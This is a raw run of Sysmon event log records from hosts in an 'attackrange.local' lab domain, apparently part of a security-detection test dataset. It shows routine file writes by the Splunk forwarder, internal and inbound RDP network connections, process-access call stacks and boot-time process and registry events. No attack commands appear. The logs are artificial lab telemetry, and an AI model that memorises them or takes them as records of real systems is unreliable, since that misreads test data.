Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD257AFA503A90CF0DD76543D156589B,SHA256=A3B3FB952E8759FF68EB4B2B4BF695801AFB73C6DF350818407AF54B9417BA61,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980480Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:53.767{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59489-false10.0.1.12-8000- 23542300x8000000000000000980482Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:57.598{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D9087B357E6672783EA9104E934487E,SHA256=006922305AD161113658640B295DEEA95AE698A3FBD644076AD3B51E0AC5C616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980484Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:58.614{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76781F5234217740B344581E5A3D61CF,SHA256=6811B4D21984C2B08575409DFB221349F64A3159E1D1B1B9E2FCF98F52909428,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980483Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:56.023{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59418-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980487Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:59.629{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CF56F1178CA7ECBEE72A24EEA5A586A,SHA256=D33191064031716963DD5E939DE2AA0685988C9D790ACF6F51DCB5669E5EA28D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980486Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:59.254{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2379B369DACE96A6A256F42ED6A4BC1C,SHA256=7FA2DE3A5C1ECBFBD9A564FEDB93F3EC8869BDA901B9F8CD92FA8AF7078465B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980485Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:59.254{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFC87C8DA0FE0C05EB176F7BB6773088,SHA256=D54004A52035E929FA31E8C316AE3C68FF767867558EA4E39B132F1153340846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980488Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:00.833{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=121013B662C7BC7BB56292A95F3F83DE,SHA256=34B18376FFB439CD05EF6576AC4D98814C91D018D15992FA5507A4B3870A130A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980490Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:01.973{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7973DFEBE180BD0CC722039E021EB03C,SHA256=086DF8CC96CB4A6A422A1A931F3A09082C8DCD60CBE0A97CB0AAACCCA63E31B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980489Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:58.877{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59492-false10.0.1.12-8000- 23542300x8000000000000000980491Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:02.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2379B369DACE96A6A256F42ED6A4BC1C,SHA256=7FA2DE3A5C1ECBFBD9A564FEDB93F3EC8869BDA901B9F8CD92FA8AF7078465B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980494Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:00.392{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59487-false10.0.1.14-135epmap 22542200x8000000000000000980493Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:59.789{69CF5F33-7F28-614D-1400-00000000FD01}368eu-central-1.compute.internal10054-C:\Windows\System32\svchost.exe 23542300x8000000000000000980492Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:03.195{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA4E519014C5B3F82CAA502CA5E8739,SHA256=6E4841CFBA5E4C7DAA224DADD4A089EC7886487EA2A14BC769A23BC21DB875FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980497Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:01.926{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59493-false10.0.1.14-135epmap 23542300x8000000000000000980496Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:04.398{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EA1C860CCA6B146BB60806ADEF8AB36,SHA256=20BC88F34FB0048263751816D1BE704B4BAA3DF111DCB2CADD28FF26D4F98AAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980495Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:04.304{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4518C1989BAD0F42B1C10E4000E32AE,SHA256=1733666DA106ADE03660AE40A868D9F480879A91EBE6331E7D2443B5DBF1E3EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980499Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:02.364{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59488-false10.0.1.14-135epmap 23542300x8000000000000000980498Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:05.570{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4A39C7917ACA85EC067F06098AF7A24,SHA256=364FFD62D8E1C73DB762954E431A9C892DD7D6F51CDA5C10DDC40C89909FDDDE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980501Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:03.895{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59494-false10.0.1.12-8000- 23542300x8000000000000000980500Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:06.632{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1FE160FE19E60B6B9EB66140C7A5DA1,SHA256=C6BD084F5F0020101A36734DAE3AAC70AF7774D9AAA307A08E208099697FE1D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980505Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:07.726{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980504Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:07.726{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980503Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:07.726{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980502Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:07.648{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C266F67DA876C06F4BF4689A247520DB,SHA256=063C38D697909E6F7D9411E125B4FFC8B8902D1837F896D40C1CE1DC87BBDFE8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980508Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:05.438{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65088-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980507Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:04.556{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59899-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980506Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:08.711{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26947AF5BF2940258622E83939637402,SHA256=F400F3CD8293E34DB4DE92ABFB80A6F531A6428C5D155E4B38662853AB5C587B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980509Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:09.711{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5023C752CC213E913EF45770F24F45B0,SHA256=5F9635399A1D4FBCEEFF56970A0A683B1FE6863109AA77B17794AE1BB7518B9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980510Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:10.726{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E29FE2777E7847580257B9A637CBA26B,SHA256=F06AC0720B6048D066F477FAA9AFFCDA9DF3DBBFE6187CF5B67D4E0831357A90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980512Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:11.742{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F28E20897D3D13DE7A86E4E612CF6636,SHA256=8DE5206F2A58851B092C3FC25207252305D89099AE1A2326AF0AECB7A78CF527,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000980511Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:08.510{69CF5F33-7F28-614D-1200-00000000FD01}968win-dc-429.attackrange.local1460-C:\Windows\System32\svchost.exe 23542300x8000000000000000980514Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:12.742{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8080226050AC5F6972FB0437723A234E,SHA256=73C1FEEFAF19DD5208AAB3C1475E1DB37FBD6928F9A40B93C494501A8474AC83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980513Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:09.849{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59495-false10.0.1.12-8000- 23542300x8000000000000000980516Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:13.851{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980515Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:13.757{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=403C67EEEC5A922F57052158C14F47BF,SHA256=4E56D1467D029749531E82A84A26E2C1E822E1D731CF434BA8AABBE4C73FC34E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980517Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:14.773{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51872683E8B17AED479A00D6FD5374E0,SHA256=C9C7B1D71ACBDBD4DBE6403F1B8BEFCED083988CFB0AB6E20977A3AAF8D57500,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980520Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:15.995{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4316MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980519Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:15.962{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A2D9E20688B1D9AAE9F020232122960,SHA256=8CD88F6EFEC017994658F2F768F72FB00ED48CA0C488B88C4F6591A9D14D96E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980518Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:12.474{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59496-false10.0.1.12-8089- 13241300x80000000000000001052511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:57.154{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Parameters\Wdf\TimeOfLastTelemetryLogQWORD (0x01d7b380-0xd6cb3874) 13241300x80000000000000001052510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:57.154{5EBD8912-8CBD-6151-0500-00000000FD01}416C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\VolatileSettings\{5b45201d-f2f2-4f3b-85bb-30ff1f953599}Binary Data 13241300x80000000000000001052509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:57.154{5EBD8912-8CBD-6151-0500-00000000FD01}416C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\Video\ServiceBasicDisplay 13241300x80000000000000001052508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:57.154{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001052507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:57.154{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\CountDWORD (0x00000001) 13241300x80000000000000001052506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:57.154{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\0DISPLAY\Default_Monitor\4&6798829&0&UID0 10341000x80000000000000001052505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.092{5EBD8912-8CBC-6151-0400-00000000FD01}408412C:\Windows\System32\smss.exe{5EBD8912-8CBD-6151-0500-00000000FD01}416C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001052504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.104{5EBD8912-8CBD-6151-0500-00000000FD01}416C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{5EBD8912-8CBC-6151-0400-00000000FD01}408C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001d0 0000007c 10341000x80000000000000001052503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:56.982{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}408C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:56.982{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}408C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001052501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:56.994{5EBD8912-8CBC-6151-0400-00000000FD01}408C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000001d0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{5EBD8912-8CA0-6151-0200-00000000FD01}324C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 644600x80000000000000001052500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:56.248C:\Windows\System32\drivers\AWSNVMe.sysMD5=F973CB5B8A3BF93A98EC05CC5ADE2AF2,SHA256=3FF25D39BE1979F3CE802E3A20BE2DDAD80A7E77EBCFC3393AFC1F24B8F38D34,IMPHASH=CD93018539A11565D60D28DF18DCB293trueAmazon Web Services, Inc.Valid 13241300x80000000000000001052499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.139{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Leave)Binary Data 10341000x80000000000000001052498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 